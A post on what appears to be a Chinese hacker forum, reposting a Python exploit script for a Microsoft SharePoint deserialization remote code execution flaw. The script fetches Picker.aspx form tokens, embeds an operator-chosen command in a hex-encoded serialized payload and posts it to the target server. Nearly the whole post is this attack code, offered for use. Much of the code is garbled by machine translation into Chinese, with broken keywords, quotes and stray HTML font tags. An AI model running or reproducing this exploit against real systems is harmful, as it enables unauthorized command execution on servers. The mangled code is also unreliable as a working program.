• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

Microsoft SharePoint-反序列化远程代码执行漏洞


This Wind

Recommended Posts

发布内容作者:Voulnet                                            漏洞危害等级:critlow_4.gif〔严重〕

 

<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">#!/ usr / bin / env python3</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
#-*-编码:utf-8-*-</font></font><font></font>
<font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
汇入要求</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
导入系统</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
从xml.sax.saxutils导入转义</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
从lxml导入html</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
导入编解码器</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
导入readline</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
从clint.arguments导入Args</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
导入信号</font></font><font></font>
<font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
def serialize_command(cmd):</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    总计=“”</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    对于x in cmd:</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
        a = codecs.encode(x,“ utf-16be”)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
        b = codecs.encode(a,“ hex”)。decode('ascii')</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
        总计+ = b [::-1]</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    总回报</font></font><font></font>
<font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
def deserialize_command(cmd):</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    长度= len(cmd)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    s =“”</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    对于范围(0,length,4)中的i:</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
        字符= cmd [i] + cmd [i + 1] + cmd [i + 2] + cmd [i + 3]</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
        字符=字符[::-1]</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
        c_hex = codecs.decode(字符,“ hex”)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
        a = codecs.decode(c_hex,“ utf-16be”)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
        s + = a</font></font><font></font>
                <font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    返回s</font></font><font></font>
<font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
######################################    </font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
signal.signal(signal.SIGINT,signal.default_int_handler)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
args = Args()</font></font><font></font>
<font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
myargs = dict(args.grouped)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
如果在myargs中为'--help'或在myargs中为'-h':</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    help =“”“</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
        解串选项:</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
        -h --help-此菜单</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
        -u --url-Sharepoint Picker.aspx URL(例如http://localhost/_layouts/15/Picker.aspx)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
        -c --command-在目标Sharepoint服务器上运行的命令。</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
        -f --file-包含要运行的命令的文件(对于带有多行或需要转义的字符的命令很有用)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
        “”</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    打印(帮助)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    退出(0)</font></font><font></font>
    <font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
url =''</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
cmd =''</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
文件名=''</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
如果myargs中为'--url'或myargs中为'-u':</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    尝试:</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
        url = myargs ['-url'] [0]</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    除了:</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
        url = myargs ['-u'] [0]</font></font><font></font>
   <font></font>
if '--command' in myargs or '-c' in myargs:<font></font>
    if '--file' in myargs or '-f' in myargs:<font></font>
        print("Can't use both command and file options at the same time!")<font></font>
        exit(0)<font></font>
    try:<font></font>
        cmd = myargs['--command'][0]<font></font>
    except:<font></font>
        cmd = myargs['-c'][0]<font></font>
<font></font>
if '--file' in myargs or '-f' in myargs:<font></font>
    try:<font></font>
        filename = myargs['--file'][0]<font></font>
    except:<font></font>
        filename = myargs['-f'][0]<font></font>
    file = open(filename,mode='r')<font></font>
    cmd = file.read()<font></font>
    file.close()<font></font>
    <font></font>
<font></font>
sharepoint2019and2016 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=16.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c";<font></font>
sharepoint2013 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c";<font></font>
sharepoint2010 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=14.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c";<font></font>
            <font></font>
PY2 = sys.version_info[0] == 2<font></font>
PY3 = sys.version_info[0] == 3<font></font>
<font></font>
if PY3:<font></font>
    string_types = str,<font></font>
    raw_input = input<font></font>
else:<font></font>
    string_types = basestring,<font></font>
<font></font>
if url == '':<font></font>
    url = raw_input("Enter the SharePoint Server URL ending with Picker.aspx:")<font></font>
<font></font>
headers = {<font></font>
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0',<font></font>
}<font></font>
<font></font>
firstcall = requests.get(url,headers=headers)<font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
spheader = firstcall.headers.get('MicrosoftSharePointTeamServices','16')</font></font><font></font>
<font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
spheader = int(spheader.split('。')[0])</font></font><font></font>
<font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
有效载荷=“__020005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500d500c200020035009700370047005600d600e2004400160047001600e20035005600270067009600360056003700c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3002600730073001600530036005300630013009300330043005600030083009300a300c300f3008700d600c600020067005600270037009600f600e600d30022001300e2000300220002005600e6003600f60046009600e6007600d3002200570047006600d200130063002200f300e300d000a000c3005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700d600c600e6003700a300870037009600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d6001600d2009600e600370047001600e60036005600220002008700d600c600e6003700a300870037004600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d60016002200e300d000a00002000200c30005002700f600a6005600360047005600460005002700f600070056002700470097000300e300d000a0000200020002000200c300f4002600a6005600360047009400e600370047001600e600360056000200870037009600a3004700970007005600d300220085001600d600c60025005600160046005600270022000200f200e300d000a0000200020002000200c300d400560047008600f6004600e4001600d6005600e30005001600270037005600c300f200d400560047008600f6004600e4001600d6005600e300d000a0000200020002000200c300d400560047008600f60046000500160027001600d60056004700560027003700e300d000a000020002000200020002000200c3001600e600970045009700070056000200870037009600a3004700970007005600d3002200870037004600a3003700470027009600e60076002200e3006200c6004700b300250056003700f600570027003600560044009600360047009600f600e60016002700970002008700d600c600e6003700d30072008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600f20007002700560037005600e6004700160047009600f600e600720002008700d600c600e6003700a3008700d30072008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600720002008700d600c600e6003700a30035009700370047005600d600d30072003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600b3001600370037005600d6002600c6009700d300d60037003600f6002700c60096002600720002008700d600c600e6003700a3004400960016007600d30072003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600e2004400960016007600e600f60037004700960036003700b3001600370037005600d6002600c6009700d30037009700370047005600d6007200620076004700b3006200c6004700b300f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700a300b40056009700d3007200970072000200f4002600a6005600360047004500970007005600d3007200b7008700a300450097000700560002004400960016007600a30005002700f6003600560037003700d70072000200d400560047008600f6004600e4001600d6005600d3007200350047001600270047007200620076004700b3006200c6004700b300f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b3006200c6004700b30035009700370047005600d600a3003500470027009600e6007600620076004700b3003600d60046006200c6004700b300f20035009700370047005600d600a3003500470027009600e6007600620076004700b3006200c6004700b30035009700370047005600d600a3003500470027009600e6007600620076004700b300f20036000200e200e200e200140024003400e200e200e20002006200c6004700b300f20035009700370047005600d600a3003500470027009600e6007600620076004700b3006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700”</font></font><font></font>
<font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
程序集值=份额2019和2016</font></font><font></font>
<font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
如果spheader == 15:</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    assemblyvalue = sharepoint2013</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
Elif Spheader == 14:</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    assemblyvalue = sharepoint2010</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
其他:</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    程序集值=份额2019和2016</font></font><font></font>
<font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
FullURL = url +程序集值</font></font><font></font>
<font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
secondcall = request.get(FullURL,headers = headers)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
secondcalltext = secondcall.text</font></font><font></font>
<font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
树= html.fromstring(secondcall.content)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
viewstate =''</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
eventvalidation =''</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
尝试:</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    viewstate = tree.get_element_by_id('__ VIEWSTATE')</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    viewstate = viewstate.value</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
除了:</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    通过</font></font><font></font>
<font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
尝试:</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    eventvalidation = tree.get_element_by_id('__ EVENTVALIDATION')</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    eventvalidation = eventvalidation.value</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
除了:</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    通过</font></font><font></font>
<font></font>
<font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
如果cmd =='':</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
    cmd = raw_input(“在此处编写完整的命令以在测试目标系统上执行(确保您具有系统所有者的权限):”)</font></font><font></font>
<font></font>
<font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
#escapedcmd =逃生(cmd,html_escape_table)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
cmd = cmd.replace(“&”,“&”)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
cmd = cmd.replace(“>”,“>”)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
cmd = cmd.replace(“ <”,“ <”)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
cmd = cmd.replace(“ \”“,”“”)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
cmd = cmd.replace(“'”,“'”“)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
escapedcmd =转义(cmd)</font></font><font></font>
<font></font>
<font></font>
<font></font>
<font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
打印(转义的cmd)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
srlcmd = serialize_command(转义的cmd)</font></font><font></font>
<font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
长度= 1448 + len(escapedcmd)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
hex_length =格式(长度* 4,'x')</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
serialized_length = hex_length [::-1]</font></font><font></font>
<font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
有效负载= payload.replace(“ e200e200e200140024003400e200e200e200”,srlcmd)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
有效负载= payload.replace(“ zzzz”,serialized_length)</font></font><font></font>
<font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
print(“反序列化的有效负载:”)</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
打印(deserialize_command(有效载荷[8:]))</font></font><font></font>
data = {"__VIEWSTATE":viewstate,"__EVENTVALIDATION":eventvalidation,"ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData":payload}<font></font>
thirdcall = requests.post(FullURL, data=data,headers=headers)<font></font>
<font></font>
print("Payload launched! Check execution results. Exiting...")<font></font>
<font></font>
#  [2020-03-20]  #
 
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now